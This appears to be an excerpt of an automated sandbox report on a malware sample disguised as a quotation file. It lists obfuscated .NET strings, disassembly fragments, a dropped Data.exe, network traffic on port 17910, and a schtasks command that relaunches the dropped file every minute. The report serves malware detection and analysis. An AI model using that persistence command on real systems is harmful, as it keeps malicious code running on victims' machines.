[(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: QUOTATION062022.exeString found in binary or memory: dotNetProtector
                        Source: QUOTATION062022.exeString found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: Data.exe.9.drString found in binary or memory: dotNetProtector
                        Source: Data.exe.9.drString found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_008923A0 pushfd ; iretd 0_2_0089281B
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_008922A7 push edx; retf 0_2_0089239F
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_00898332 pushad ; iretd 0_2_00898337
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_028028B3 push edx; retf 0_2_02802943
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_02802AF2 pushfd ; iretd 0_2_02802AF3
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7A7EA pushad ; iretd 0_2_04E7A8AC
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7A975 push cs; retn 0040h0_2_04E7A976
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E74C73 pushad ; retf 0_2_04E74CC5
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7A75D push eax; retn 0040h0_2_04E7A75E
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E8AB85 push ebp; retf 0040h0_2_04E8AB86
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E9A4D2 push ecx; iretd 0_2_04E9A4E1
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04EBB202 push E813485Eh; ret 0_2_04EBB209
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Data\Data.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49834
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49834
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
